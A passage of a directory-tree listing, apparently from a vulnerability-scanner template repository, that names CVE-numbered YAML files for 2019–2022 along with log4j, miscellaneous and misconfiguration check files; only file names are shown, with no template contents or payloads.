CVE-2019-2578.yaml │ │ │ ├── CVE-2019-2579.yaml │ │ │ ├── CVE-2019-2588.yaml │ │ │ ├── CVE-2019-2616.yaml │ │ │ ├── CVE-2019-2725.yaml │ │ │ ├── CVE-2019-2729.yaml │ │ │ ├── CVE-2019-2767.yaml │ │ │ ├── CVE-2019-3396.yaml │ │ │ ├── CVE-2019-3401.yaml │ │ │ ├── CVE-2019-3402.yaml │ │ │ ├── CVE-2019-3403.yaml │ │ │ ├── CVE-2019-3799.yaml │ │ │ ├── CVE-2019-3911.yaml │ │ │ ├── CVE-2019-3912.yaml │ │ │ ├── CVE-2019-3929.yaml │ │ │ ├── CVE-2019-5127.yaml │ │ │ ├── CVE-2019-5418.yaml │ │ │ ├── CVE-2019-6112.yaml │ │ │ ├── CVE-2019-6340.yaml │ │ │ ├── CVE-2019-6715.yaml │ │ │ ├── CVE-2019-7219.yaml │ │ │ ├── CVE-2019-7238.yaml │ │ │ ├── CVE-2019-7254.yaml │ │ │ ├── CVE-2019-7256.yaml │ │ │ ├── CVE-2019-7275.yaml │ │ │ ├── CVE-2019-7481.yaml │ │ │ ├── CVE-2019-7543.yaml │ │ │ ├── CVE-2019-7609.yaml │ │ │ ├── CVE-2019-8442.yaml │ │ │ ├── CVE-2019-8446.yaml │ │ │ ├── CVE-2019-8449.yaml │ │ │ ├── CVE-2019-8451.yaml │ │ │ ├── CVE-2019-8903.yaml │ │ │ ├── CVE-2019-8937.yaml │ │ │ ├── CVE-2019-8982.yaml │ │ │ ├── CVE-2019-9041.yaml │ │ │ ├── CVE-2019-9618.yaml │ │ │ ├── CVE-2019-9670.yaml │ │ │ ├── CVE-2019-9726.yaml │ │ │ ├── CVE-2019-9733.yaml │ │ │ ├── CVE-2019-9955.yaml │ │ │ └── CVE-2019-9978.yaml │ │ ├── 2020 │ │ │ ├── CVE-2020-0618.yaml │ │ │ ├── CVE-2020-10148.yaml │ │ │ ├── CVE-2020-10546.yaml │ │ │ ├── CVE-2020-10547.yaml │ │ │ ├── CVE-2020-10548.yaml │ │ │ ├── CVE-2020-10549.yaml │ │ │ ├── CVE-2020-10770.yaml │ │ │ ├── CVE-2020-11034.yaml │ │ │ ├── CVE-2020-11110.yaml │ │ │ ├── CVE-2020-11455.yaml │ │ │ ├── CVE-2020-11529.yaml │ │ │ ├── CVE-2020-11546.yaml │ │ │ ├── CVE-2020-11547.yaml │ │ │ ├── CVE-2020-11710.yaml │ │ │ ├── CVE-2020-11738.yaml │ │ │ ├── CVE-2020-11853.yaml │ │ │ ├── CVE-2020-11854.yaml │ │ │ ├── CVE-2020-11930.yaml │ │ │ ├── CVE-2020-11978.yaml │ │ │ ├── CVE-2020-11991.yaml │ │ │ ├── CVE-2020-12054.yaml │ │ │ ├── CVE-2020-12116.yaml │ │ │ ├── CVE-2020-12447.yaml │ │ │ ├── CVE-2020-12720.yaml │ │ │ ├── CVE-2020-12800.yaml │ │ │ ├── CVE-2020-13117.yaml │ │ │ ├── CVE-2020-13158.yaml │ │ │ ├── CVE-2020-13167.yaml │ │ │ ├── CVE-2020-13483.yaml │ │ │ ├── CVE-2020-13700.yaml │ │ │ ├── CVE-2020-13927.yaml │ │ │ ├── CVE-2020-13937.yaml │ │ │ ├── CVE-2020-13942.yaml │ │ │ ├── CVE-2020-13945.yaml │ │ │ ├── CVE-2020-14092.yaml │ │ │ ├── CVE-2020-14179.yaml │ │ │ ├── CVE-2020-14181.yaml │ │ │ ├── CVE-2020-14413.yaml │ │ │ ├── CVE-2020-14864.yaml │ │ │ ├── CVE-2020-14882.yaml │ │ │ ├── CVE-2020-14883.yaml │ │ │ ├── CVE-2020-15050.yaml │ │ │ ├── CVE-2020-15129.yaml │ │ │ ├── CVE-2020-15148.yaml │ │ │ ├── CVE-2020-15227.yaml │ │ │ ├── CVE-2020-15500.yaml │ │ │ ├── CVE-2020-15505.yaml │ │ │ ├── CVE-2020-15568.yaml │ │ │ ├── CVE-2020-15920.yaml │ │ │ ├── CVE-2020-16139.yaml │ │ │ ├── CVE-2020-16846.yaml │ │ │ ├── CVE-2020-16952.yaml │ │ │ ├── CVE-2020-17362.yaml │ │ │ ├── CVE-2020-17453.yaml │ │ │ ├── CVE-2020-17456.yaml │ │ │ ├── CVE-2020-17496.yaml │ │ │ ├── CVE-2020-17505.yaml │ │ │ ├── CVE-2020-17506.yaml │ │ │ ├── CVE-2020-17518.yaml │ │ │ ├── CVE-2020-17519.yaml │ │ │ ├── CVE-2020-17530.yaml │ │ │ ├── CVE-2020-18268.yaml │ │ │ ├── CVE-2020-19282.yaml │ │ │ ├── CVE-2020-19283.yaml │ │ │ ├── CVE-2020-19295.yaml │ │ │ ├── CVE-2020-19360.yaml │ │ │ ├── CVE-2020-1938.yaml │ │ │ ├── CVE-2020-1943.yaml │ │ │ ├── CVE-2020-19625.yaml │ │ │ ├── CVE-2020-2036.yaml │ │ │ ├── CVE-2020-2096.yaml │ │ │ ├── CVE-2020-20982.yaml │ │ │ ├── CVE-2020-2103.yaml │ │ │ ├── CVE-2020-21224.yaml │ │ │ ├── CVE-2020-2140.yaml │ │ │ ├── CVE-2020-22210.yaml │ │ │ ├── CVE-2020-22840.yaml │ │ │ ├── CVE-2020-23015.yaml │ │ │ ├── CVE-2020-23517.yaml │ │ │ ├── CVE-2020-23575.yaml │ │ │ ├── CVE-2020-23972.yaml │ │ │ ├── CVE-2020-24148.yaml │ │ │ ├── CVE-2020-24186.yaml │ │ │ ├── CVE-2020-24223.yaml │ │ │ ├── CVE-2020-24312.yaml │ │ │ ├── CVE-2020-24391.yaml │ │ │ ├── CVE-2020-24550.yaml │ │ │ ├── CVE-2020-24571.yaml │ │ │ ├── CVE-2020-24579.yaml │ │ │ ├── CVE-2020-24589.yaml │ │ │ ├── CVE-2020-24912.yaml │ │ │ ├── CVE-2020-24949.yaml │ │ │ ├── CVE-2020-25078.yaml │ │ │ ├── CVE-2020-25213.yaml │ │ │ ├── CVE-2020-25223.yaml │ │ │ ├── CVE-2020-25495.yaml │ │ │ ├── CVE-2020-25506.yaml │ │ │ ├── CVE-2020-2551.yaml │ │ │ ├── CVE-2020-25540.yaml │ │ │ ├── CVE-2020-25780.yaml │ │ │ ├── CVE-2020-25864.yaml │ │ │ ├── CVE-2020-26073.yaml │ │ │ ├── CVE-2020-26153.yaml │ │ │ ├── CVE-2020-26214.yaml │ │ │ ├── CVE-2020-26413.yaml │ │ │ ├── CVE-2020-26876.yaml │ │ │ ├── CVE-2020-26919.yaml │ │ │ ├── CVE-2020-26948.yaml │ │ │ ├── CVE-2020-27191.yaml │ │ │ ├── CVE-2020-27361.yaml │ │ │ ├── CVE-2020-27467.yaml │ │ │ ├── CVE-2020-27735.yaml │ │ │ ├── CVE-2020-27866.yaml │ │ │ ├── CVE-2020-27982.yaml │ │ │ ├── CVE-2020-27986.yaml │ │ │ ├── CVE-2020-28188.yaml │ │ │ ├── CVE-2020-28208.yaml │ │ │ ├── CVE-2020-28351.yaml │ │ │ ├── CVE-2020-28871.yaml │ │ │ ├── CVE-2020-28976.yaml │ │ │ ├── CVE-2020-29164.yaml │ │ │ ├── CVE-2020-29227.yaml │ │ │ ├── CVE-2020-29395.yaml │ │ │ ├── CVE-2020-29453.yaml │ │ │ ├── CVE-2020-3187.yaml │ │ │ ├── CVE-2020-3452.yaml │ │ │ ├── CVE-2020-35234.yaml │ │ │ ├── CVE-2020-35338.yaml │ │ │ ├── CVE-2020-35476.yaml │ │ │ ├── CVE-2020-35489.yaml │ │ │ ├── CVE-2020-35580.yaml │ │ │ ├── CVE-2020-35598.yaml │ │ │ ├── CVE-2020-35713.yaml │ │ │ ├── CVE-2020-35729.yaml │ │ │ ├── CVE-2020-35736.yaml │ │ │ ├── CVE-2020-35749.yaml │ │ │ ├── CVE-2020-35774.yaml │ │ │ ├── CVE-2020-3580.yaml │ │ │ ├── CVE-2020-35846.yaml │ │ │ ├── CVE-2020-35847.yaml │ │ │ ├── CVE-2020-35848.yaml │ │ │ ├── CVE-2020-35951.yaml │ │ │ ├── CVE-2020-36112.yaml │ │ │ ├── CVE-2020-36289.yaml │ │ │ ├── CVE-2020-36365.yaml │ │ │ ├── CVE-2020-36510.yaml │ │ │ ├── CVE-2020-4463.yaml │ │ │ ├── CVE-2020-5284.yaml │ │ │ ├── CVE-2020-5307.yaml │ │ │ ├── CVE-2020-5405.yaml │ │ │ ├── CVE-2020-5410.yaml │ │ │ ├── CVE-2020-5412.yaml │ │ │ ├── CVE-2020-5775.yaml │ │ │ ├── CVE-2020-5776.yaml │ │ │ ├── CVE-2020-5777.yaml │ │ │ ├── CVE-2020-5847.yaml │ │ │ ├── CVE-2020-5902.yaml │ │ │ ├── CVE-2020-6171.yaml │ │ │ ├── CVE-2020-6207.yaml │ │ │ ├── CVE-2020-6287.yaml │ │ │ ├── CVE-2020-6308.yaml │ │ │ ├── CVE-2020-6637.yaml │ │ │ ├── CVE-2020-7136.yaml │ │ │ ├── CVE-2020-7209.yaml │ │ │ ├── CVE-2020-7247.yaml │ │ │ ├── CVE-2020-7318.yaml │ │ │ ├── CVE-2020-7796.yaml │ │ │ ├── CVE-2020-7943.yaml │ │ │ ├── CVE-2020-7961.yaml │ │ │ ├── CVE-2020-7980.yaml │ │ │ ├── CVE-2020-8115.yaml │ │ │ ├── CVE-2020-8163.yaml │ │ │ ├── CVE-2020-8191.yaml │ │ │ ├── CVE-2020-8193.yaml │ │ │ ├── CVE-2020-8194.yaml │ │ │ ├── CVE-2020-8209.yaml │ │ │ ├── CVE-2020-8497.yaml │ │ │ ├── CVE-2020-8512.yaml │ │ │ ├── CVE-2020-8515.yaml │ │ │ ├── CVE-2020-8641.yaml │ │ │ ├── CVE-2020-8771.yaml │ │ │ ├── CVE-2020-8813.yaml │ │ │ ├── CVE-2020-8982.yaml │ │ │ ├── CVE-2020-9036.yaml │ │ │ ├── CVE-2020-9047.yaml │ │ │ ├── CVE-2020-9054.yaml │ │ │ ├── CVE-2020-9315.yaml │ │ │ ├── CVE-2020-9344.yaml │ │ │ ├── CVE-2020-9376.yaml │ │ │ ├── CVE-2020-9402.yaml │ │ │ ├── CVE-2020-9425.yaml │ │ │ ├── CVE-2020-9483.yaml │ │ │ ├── CVE-2020-9484.yaml │ │ │ ├── CVE-2020-9490.yaml │ │ │ ├── CVE-2020-9496.yaml │ │ │ └── CVE-2020-9757.yaml │ │ ├── 2021 │ │ │ ├── CVE-2021-1497.yaml │ │ │ ├── CVE-2021-1498.yaml │ │ │ ├── CVE-2021-1499.yaml │ │ │ ├── CVE-2021-20031.yaml │ │ │ ├── CVE-2021-20038.yaml │ │ │ ├── CVE-2021-20090.yaml │ │ │ ├── CVE-2021-20091.yaml │ │ │ ├── CVE-2021-20092.yaml │ │ │ ├── CVE-2021-20114.yaml │ │ │ ├── CVE-2021-20123.yaml │ │ │ ├── CVE-2021-20124.yaml │ │ │ ├── CVE-2021-20150.yaml │ │ │ ├── CVE-2021-20158.yaml │ │ │ ├── CVE-2021-20167.yaml │ │ │ ├── CVE-2021-20792.yaml │ │ │ ├── CVE-2021-20837.yaml │ │ │ ├── CVE-2021-21234.yaml │ │ │ ├── CVE-2021-21287.yaml │ │ │ ├── CVE-2021-21307.yaml │ │ │ ├── CVE-2021-21311.yaml │ │ │ ├── CVE-2021-21315.yaml │ │ │ ├── CVE-2021-21389.yaml │ │ │ ├── CVE-2021-21402.yaml │ │ │ ├── CVE-2021-21479.yaml │ │ │ ├── CVE-2021-21801.yaml │ │ │ ├── CVE-2021-21802.yaml │ │ │ ├── CVE-2021-21803.yaml │ │ │ ├── CVE-2021-21816.yaml │ │ │ ├── CVE-2021-21881.yaml │ │ │ ├── CVE-2021-21972.yaml │ │ │ ├── CVE-2021-21973.yaml │ │ │ ├── CVE-2021-21975.yaml │ │ │ ├── CVE-2021-21978.yaml │ │ │ ├── CVE-2021-21985.yaml │ │ │ ├── CVE-2021-22005.yaml │ │ │ ├── CVE-2021-22053.yaml │ │ │ ├── CVE-2021-22054.yaml │ │ │ ├── CVE-2021-22122.yaml │ │ │ ├── CVE-2021-22145.yaml │ │ │ ├── CVE-2021-22205.yaml │ │ │ ├── CVE-2021-22214.yaml │ │ │ ├── CVE-2021-22873.yaml │ │ │ ├── CVE-2021-22986.yaml │ │ │ ├── CVE-2021-23241.yaml │ │ │ ├── CVE-2021-24146.yaml │ │ │ ├── CVE-2021-24176.yaml │ │ │ ├── CVE-2021-24210.yaml │ │ │ ├── CVE-2021-24226.yaml │ │ │ ├── CVE-2021-24235.yaml │ │ │ ├── CVE-2021-24237.yaml │ │ │ ├── CVE-2021-24274.yaml │ │ │ ├── CVE-2021-24275.yaml │ │ │ ├── CVE-2021-24276.yaml │ │ │ ├── CVE-2021-24278.yaml │ │ │ ├── CVE-2021-24285.yaml │ │ │ ├── CVE-2021-24288.yaml │ │ │ ├── CVE-2021-24291.yaml │ │ │ ├── CVE-2021-24298.yaml │ │ │ ├── CVE-2021-24300.yaml │ │ │ ├── CVE-2021-24316.yaml │ │ │ ├── CVE-2021-24320.yaml │ │ │ ├── CVE-2021-24335.yaml │ │ │ ├── CVE-2021-24340.yaml │ │ │ ├── CVE-2021-24342.yaml │ │ │ ├── CVE-2021-24358.yaml │ │ │ ├── CVE-2021-24364.yaml │ │ │ ├── CVE-2021-24387.yaml │ │ │ ├── CVE-2021-24389.yaml │ │ │ ├── CVE-2021-24406.yaml │ │ │ ├── CVE-2021-24407.yaml │ │ │ ├── CVE-2021-24472.yaml │ │ │ ├── CVE-2021-24488.yaml │ │ │ ├── CVE-2021-24495.yaml │ │ │ ├── CVE-2021-24498.yaml │ │ │ ├── CVE-2021-24499.yaml │ │ │ ├── CVE-2021-24510.yaml │ │ │ ├── CVE-2021-24746.yaml │ │ │ ├── CVE-2021-24750.yaml │ │ │ ├── CVE-2021-24762.yaml │ │ │ ├── CVE-2021-24838.yaml │ │ │ ├── CVE-2021-24926.yaml │ │ │ ├── CVE-2021-24947.yaml │ │ │ ├── CVE-2021-24987.yaml │ │ │ ├── CVE-2021-24991.yaml │ │ │ ├── CVE-2021-24997.yaml │ │ │ ├── CVE-2021-25008.yaml │ │ │ ├── CVE-2021-25028.yaml │ │ │ ├── CVE-2021-25033.yaml │ │ │ ├── CVE-2021-25052.yaml │ │ │ ├── CVE-2021-25055.yaml │ │ │ ├── CVE-2021-25063.yaml │ │ │ ├── CVE-2021-25074.yaml │ │ │ ├── CVE-2021-25075.yaml │ │ │ ├── CVE-2021-25111.yaml │ │ │ ├── CVE-2021-25112.yaml │ │ │ ├── CVE-2021-25118.yaml │ │ │ ├── CVE-2021-25120.yaml │ │ │ ├── CVE-2021-25281.yaml │ │ │ ├── CVE-2021-25646.yaml │ │ │ ├── CVE-2021-25864.yaml │ │ │ ├── CVE-2021-26084.yaml │ │ │ ├── CVE-2021-26085.yaml │ │ │ ├── CVE-2021-26086.yaml │ │ │ ├── CVE-2021-26247.yaml │ │ │ ├── CVE-2021-26295.yaml │ │ │ ├── CVE-2021-26475.yaml │ │ │ ├── CVE-2021-26598.yaml │ │ │ ├── CVE-2021-26710.yaml │ │ │ ├── CVE-2021-26723.yaml │ │ │ ├── CVE-2021-26812.yaml │ │ │ ├── CVE-2021-26855.yaml │ │ │ ├── CVE-2021-27132.yaml │ │ │ ├── CVE-2021-27310.yaml │ │ │ ├── CVE-2021-27330.yaml │ │ │ ├── CVE-2021-27358.yaml │ │ │ ├── CVE-2021-27561.yaml │ │ │ ├── CVE-2021-27651.yaml │ │ │ ├── CVE-2021-27850.yaml │ │ │ ├── CVE-2021-27905.yaml │ │ │ ├── CVE-2021-27931.yaml │ │ │ ├── CVE-2021-28073.yaml │ │ │ ├── CVE-2021-28149.yaml │ │ │ ├── CVE-2021-28150.yaml │ │ │ ├── CVE-2021-28151.yaml │ │ │ ├── CVE-2021-28164.yaml │ │ │ ├── CVE-2021-28169.yaml │ │ │ ├── CVE-2021-28377.yaml │ │ │ ├── CVE-2021-28854.yaml │ │ │ ├── CVE-2021-28918.yaml │ │ │ ├── CVE-2021-28937.yaml │ │ │ ├── CVE-2021-29156.yaml │ │ │ ├── CVE-2021-29203.yaml │ │ │ ├── CVE-2021-29441.yaml │ │ │ ├── CVE-2021-29442.yaml │ │ │ ├── CVE-2021-29484.yaml │ │ │ ├── CVE-2021-29490.yaml │ │ │ ├── CVE-2021-29622.yaml │ │ │ ├── CVE-2021-29625.yaml │ │ │ ├── CVE-2021-3002.yaml │ │ │ ├── CVE-2021-30049.yaml │ │ │ ├── CVE-2021-30151.yaml │ │ │ ├── CVE-2021-3017.yaml │ │ │ ├── CVE-2021-3019.yaml │ │ │ ├── CVE-2021-30213.yaml │ │ │ ├── CVE-2021-30461.yaml │ │ │ ├── CVE-2021-30497.yaml │ │ │ ├── CVE-2021-31249.yaml │ │ │ ├── CVE-2021-31250.yaml │ │ │ ├── CVE-2021-3129.yaml │ │ │ ├── CVE-2021-31537.yaml │ │ │ ├── CVE-2021-31581.yaml │ │ │ ├── CVE-2021-31589.yaml │ │ │ ├── CVE-2021-31602.yaml │ │ │ ├── CVE-2021-31682.yaml │ │ │ ├── CVE-2021-31755.yaml │ │ │ ├── CVE-2021-31805.yaml │ │ │ ├── CVE-2021-31856.yaml │ │ │ ├── CVE-2021-31862.yaml │ │ │ ├── CVE-2021-32030.yaml │ │ │ ├── CVE-2021-32172.yaml │ │ │ ├── CVE-2021-3223.yaml │ │ │ ├── CVE-2021-32305.yaml │ │ │ ├── CVE-2021-32618.yaml │ │ │ ├── CVE-2021-32682.yaml │ │ │ ├── CVE-2021-32819.yaml │ │ │ ├── CVE-2021-32820.yaml │ │ │ ├── CVE-2021-32853.yaml │ │ │ ├── CVE-2021-3293.yaml │ │ │ ├── CVE-2021-3297.yaml │ │ │ ├── CVE-2021-33044.yaml │ │ │ ├── CVE-2021-33221.yaml │ │ │ ├── CVE-2021-33357.yaml │ │ │ ├── CVE-2021-33544.yaml │ │ │ ├── CVE-2021-33564.yaml │ │ │ ├── CVE-2021-3374.yaml │ │ │ ├── CVE-2021-3377.yaml │ │ │ ├── CVE-2021-3378.yaml │ │ │ ├── CVE-2021-33807.yaml │ │ │ ├── CVE-2021-33904.yaml │ │ │ ├── CVE-2021-34370.yaml │ │ │ ├── CVE-2021-34429.yaml │ │ │ ├── CVE-2021-34473.yaml │ │ │ ├── CVE-2021-34621.yaml │ │ │ ├── CVE-2021-34640.yaml │ │ │ ├── CVE-2021-34643.yaml │ │ │ ├── CVE-2021-34805.yaml │ │ │ ├── CVE-2021-35265.yaml │ │ │ ├── CVE-2021-35336.yaml │ │ │ ├── CVE-2021-35464.yaml │ │ │ ├── CVE-2021-35587.yaml │ │ │ ├── CVE-2021-3577.yaml │ │ │ ├── CVE-2021-36260.yaml │ │ │ ├── CVE-2021-36356.yaml │ │ │ ├── CVE-2021-36380.yaml │ │ │ ├── CVE-2021-3654.yaml │ │ │ ├── CVE-2021-36748.yaml │ │ │ ├── CVE-2021-36749.yaml │ │ │ ├── CVE-2021-37216.yaml │ │ │ ├── CVE-2021-37416.yaml │ │ │ ├── CVE-2021-37538.yaml │ │ │ ├── CVE-2021-37573.yaml │ │ │ ├── CVE-2021-37580.yaml │ │ │ ├── CVE-2021-37704.yaml │ │ │ ├── CVE-2021-37833.yaml │ │ │ ├── CVE-2021-38314.yaml │ │ │ ├── CVE-2021-38540.yaml │ │ │ ├── CVE-2021-38647.yaml │ │ │ ├── CVE-2021-38702.yaml │ │ │ ├── CVE-2021-38704.yaml │ │ │ ├── CVE-2021-38751.yaml │ │ │ ├── CVE-2021-39226.yaml │ │ │ ├── CVE-2021-39312.yaml │ │ │ ├── CVE-2021-39316.yaml │ │ │ ├── CVE-2021-39320.yaml │ │ │ ├── CVE-2021-39322.yaml │ │ │ ├── CVE-2021-39327.yaml │ │ │ ├── CVE-2021-39350.yaml │ │ │ ├── CVE-2021-39433.yaml │ │ │ ├── CVE-2021-39501.yaml │ │ │ ├── CVE-2021-40323.yaml │ │ │ ├── CVE-2021-40438.yaml │ │ │ ├── CVE-2021-40539.yaml │ │ │ ├── CVE-2021-40542.yaml │ │ │ ├── CVE-2021-40856.yaml │ │ │ ├── CVE-2021-40859.yaml │ │ │ ├── CVE-2021-40868.yaml │ │ │ ├── CVE-2021-40870.yaml │ │ │ ├── CVE-2021-40875.yaml │ │ │ ├── CVE-2021-40960.yaml │ │ │ ├── CVE-2021-40978.yaml │ │ │ ├── CVE-2021-41174.yaml │ │ │ ├── CVE-2021-41192.yaml │ │ │ ├── CVE-2021-41266.yaml │ │ │ ├── CVE-2021-41277.yaml │ │ │ ├── CVE-2021-41282.yaml │ │ │ ├── CVE-2021-41291.yaml │ │ │ ├── CVE-2021-41293.yaml │ │ │ ├── CVE-2021-41349.yaml │ │ │ ├── CVE-2021-41381.yaml │ │ │ ├── CVE-2021-41467.yaml │ │ │ ├── CVE-2021-41648.yaml │ │ │ ├── CVE-2021-41649.yaml │ │ │ ├── CVE-2021-41653.yaml │ │ │ ├── CVE-2021-41691.yaml │ │ │ ├── CVE-2021-41773.yaml │ │ │ ├── CVE-2021-41826.yaml │ │ │ ├── CVE-2021-41878.yaml │ │ │ ├── CVE-2021-4191.yaml │ │ │ ├── CVE-2021-41951.yaml │ │ │ ├── CVE-2021-42013.yaml │ │ │ ├── CVE-2021-42063.yaml │ │ │ ├── CVE-2021-42071.yaml │ │ │ ├── CVE-2021-42237.yaml │ │ │ ├── CVE-2021-42258.yaml │ │ │ ├── CVE-2021-42551.yaml │ │ │ ├── CVE-2021-42565.yaml │ │ │ ├── CVE-2021-42566.yaml │ │ │ ├── CVE-2021-42567.yaml │ │ │ ├── CVE-2021-43062.yaml │ │ │ ├── CVE-2021-43287.yaml │ │ │ ├── CVE-2021-43495.yaml │ │ │ ├── CVE-2021-43496.yaml │ │ │ ├── CVE-2021-43778.yaml │ │ │ ├── CVE-2021-43798.yaml │ │ │ ├── CVE-2021-43810.yaml │ │ │ ├── CVE-2021-44077.yaml │ │ │ ├── CVE-2021-44103.yaml │ │ │ ├── CVE-2021-44228.yaml │ │ │ ├── CVE-2021-44427.yaml │ │ │ ├── CVE-2021-44451.yaml │ │ │ ├── CVE-2021-44515.yaml │ │ │ ├── CVE-2021-44521.yaml │ │ │ ├── CVE-2021-44528.yaml │ │ │ ├── CVE-2021-44529.yaml │ │ │ ├── CVE-2021-44848.yaml │ │ │ ├── CVE-2021-45043.yaml │ │ │ ├── CVE-2021-45046.yaml │ │ │ ├── CVE-2021-45092.yaml │ │ │ ├── CVE-2021-45232.yaml │ │ │ ├── CVE-2021-45380.yaml │ │ │ ├── CVE-2021-45967.yaml │ │ │ ├── CVE-2021-45968.yaml │ │ │ ├── CVE-2021-46005.yaml │ │ │ ├── CVE-2021-46381.yaml │ │ │ ├── CVE-2021-46387.yaml │ │ │ ├── CVE-2021-46417.yaml │ │ │ └── CVE-2021-46424.yaml │ │ └── 2022 │ │ │ ├── CVE-2022-0140.yaml │ │ │ ├── CVE-2022-0148.yaml │ │ │ ├── CVE-2022-0149.yaml │ │ │ ├── CVE-2022-0165.yaml │ │ │ ├── CVE-2022-0189.yaml │ │ │ ├── CVE-2022-0201.yaml │ │ │ ├── CVE-2022-0208.yaml │ │ │ ├── CVE-2022-0218.yaml │ │ │ ├── CVE-2022-0271.yaml │ │ │ ├── CVE-2022-0281.yaml │ │ │ ├── CVE-2022-0288.yaml │ │ │ ├── CVE-2022-0378.yaml │ │ │ ├── CVE-2022-0381.yaml │ │ │ ├── CVE-2022-0422.yaml │ │ │ ├── CVE-2022-0432.yaml │ │ │ ├── CVE-2022-0437.yaml │ │ │ ├── CVE-2022-0482.yaml │ │ │ ├── CVE-2022-0540.yaml │ │ │ ├── CVE-2022-0543.yaml │ │ │ ├── CVE-2022-0591.yaml │ │ │ ├── CVE-2022-0595.yaml │ │ │ ├── CVE-2022-0653.yaml │ │ │ ├── CVE-2022-0692.yaml │ │ │ ├── CVE-2022-1020.yaml │ │ │ ├── CVE-2022-1040.yaml │ │ │ ├── CVE-2022-1054.yaml │ │ │ ├── CVE-2022-1119.yaml │ │ │ ├── CVE-2022-1221.yaml │ │ │ ├── CVE-2022-1388.yaml │ │ │ ├── CVE-2022-1392.yaml │ │ │ ├── CVE-2022-1439.yaml │ │ │ ├── CVE-2022-1598.yaml │ │ │ ├── CVE-2022-21371.yaml │ │ │ ├── CVE-2022-21705.yaml │ │ │ ├── CVE-2022-22536.yaml │ │ │ ├── CVE-2022-22947.yaml │ │ │ ├── CVE-2022-22954.yaml │ │ │ ├── CVE-2022-22963.yaml │ │ │ ├── CVE-2022-22965.yaml │ │ │ ├── CVE-2022-23131.yaml │ │ │ ├── CVE-2022-23134.yaml │ │ │ ├── CVE-2022-23178.yaml │ │ │ ├── CVE-2022-23347.yaml │ │ │ ├── CVE-2022-23779.yaml │ │ │ ├── CVE-2022-23808.yaml │ │ │ ├── CVE-2022-23881.yaml │ │ │ ├── CVE-2022-23944.yaml │ │ │ ├── CVE-2022-24112.yaml │ │ │ ├── CVE-2022-24124.yaml │ │ │ ├── CVE-2022-24260.yaml │ │ │ ├── CVE-2022-24288.yaml │ │ │ ├── CVE-2022-24990.yaml │ │ │ ├── CVE-2022-25216.yaml │ │ │ ├── CVE-2022-25323.yaml │ │ │ ├── CVE-2022-25369.yaml │ │ │ ├── CVE-2022-26148.yaml │ │ │ ├── CVE-2022-26159.yaml │ │ │ ├── CVE-2022-26233.yaml │ │ │ ├── CVE-2022-26352.yaml │ │ │ ├── CVE-2022-26564.yaml │ │ │ ├── CVE-2022-27849.yaml │ │ │ ├── CVE-2022-28363.yaml │ │ │ ├── CVE-2022-28365.yaml │ │ │ ├── CVE-2022-29464.yaml │ │ │ ├── CVE-2022-29548.yaml │ │ │ ├── CVE-2022-30489.yaml │ │ │ └── CVE-2022-30525.yaml │ ├── log4j │ │ ├── apache-ofbiz-log4j-rce.yaml │ │ ├── apache-solr-log4j-rce.yaml │ │ ├── code42-log4j-rce.yaml │ │ ├── jamf-log4j-jndi-rce.yaml │ │ ├── mobileiron-log4j-jndi-rce.yaml │ │ ├── springboot-log4j-rce.yaml │ │ ├── unifi-network-log4j-rce.yaml │ │ ├── vmware-horizon-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-log4j-jndi-rce.yaml │ │ └── vrealize-operations-log4j-rce.yaml │ ├── miscellaneous │ │ ├── addeventlistener-detect.yaml │ │ ├── apple-app-site-association.yaml │ │ ├── aws-ecs-container-agent-tasks.yaml │ │ ├── clientaccesspolicy.yaml │ │ ├── detect-dns-over-https.yaml │ │ ├── dir-listing.yaml │ │ ├── email-extractor.yaml │ │ ├── firebase-database-extractor.yaml │ │ ├── google-floc-disabled.yaml │ │ ├── htaccess-config.yaml │ │ ├── joomla-htaccess.yaml │ │ ├── joomla-manifest-file.yaml │ │ ├── microsoft-azure-error.yaml │ │ ├── moodle-changelog.yaml │ │ ├── netflix-conductor-version.yaml │ │ ├── ntlm-directories.yaml │ │ ├── old-copyright.yaml │ │ ├── options-method.yaml │ │ ├── robots-txt.yaml │ │ ├── security-txt.yaml │ │ ├── trace-method.yaml │ │ ├── unpatched-coldfusion.yaml │ │ └── xml-schema-detect.yaml │ ├── misconfiguration │ │ ├── adobe │ │ │ ├── adobe-connect-username-exposure.yaml │ │ │ └── adobe-connect-version.yaml │ │ ├── aem │ │ │ ├── aem-bg-servlet.yaml │ │ │ ├── aem-cached-pages.yaml │ │ │ ├── aem-crx-bypass.yaml │ │ │ ├── aem-default-get-servlet.yaml │ │ │ ├── aem-gql-servlet.yaml │ │ │ ├── aem-groovyconsole.yaml │ │ │ ├── aem-hash-querybuilder.yaml │ │ │ ├── aem-jcr-querybuilder.yaml │ │ │ ├── aem-login-status.yaml │ │ │ ├── aem-merge-metadata-servlet.yaml │ │ │ ├── aem-querybuilder-feed-servlet.yaml │ │ │ ├── aem-querybuilder-internal-path-read.yaml │ │ │ ├── aem-querybuilder-json-servlet.yaml │ │ │ ├── aem-setpreferences-xss.yaml │ │ │ ├── aem-userinfo-servlet.yaml │ │ │ ├── aem-wcm-suggestions-servlet.yaml │ │ │ └── aem-xss-childlist-selector.yaml │ │ ├── airflow │ │ │ ├── airflow-debug.yaml │ │ │ └── unauthenticated-airflow.yaml │ │ ├── akamai-arl-xss.yaml │ │ ├── alibaba-mongoshake-unauth.yaml │ │ ├── ampps-dirlisting.yaml │ │ ├── android-debug-database-exposed.yaml │ │ ├── apache │ │ │ ├── apache-filename-enum.yaml │ │ │ ├── apache-hbase-unauth.yaml │ │ │ ├── apache-storm-unauth.yaml │ │ │ └── apache-tomcat-snoop.yaml │ │ ├── apc-info.yaml │ │ ├── application-yaml.yaml │ │ ├── artifactory-anonymous-deploy.yaml │ │ ├── aspx-debug-mode.yaml │ │ ├── aws-object-listing.yaml │ │ ├── aws-redirect.yaml │ │ ├── browserless-debugger.yaml │ │ ├── caddy-open-redirect.yaml │ │ ├── cgi-test-page.yaml │ │ ├── clockwork-dashboard-exposure.yaml │ │ ├── cloudflare-image-ssrf.yaml │ │ ├── cobbler-exposed-directory.yaml │ │ ├── cx-cloud-upload-detect.yaml │ │ ├── d-link-arbitary-fileread.yaml │ │ ├── database-error.yaml │ │ ├── dgraph-dashboard-exposure.yaml │ │ ├── django-debug-detect.yaml │ │ ├── docker-registry.yaml │ │ ├── druid-monitor.yaml │ │ ├── drupal │ │ │ ├── drupal-user-enum-ajax.yaml │ │ │ └── drupal-user-enum-redirect.yaml │ │ ├── elasticsearch.yaml │ │ ├── etcd-unauthenticated-api.yaml │ │ ├── exposed-docker-api.yaml │ │ ├── exposed-jquery-file-upload.yaml │ │ ├── exposed-kafdrop.yaml │ │ ├── 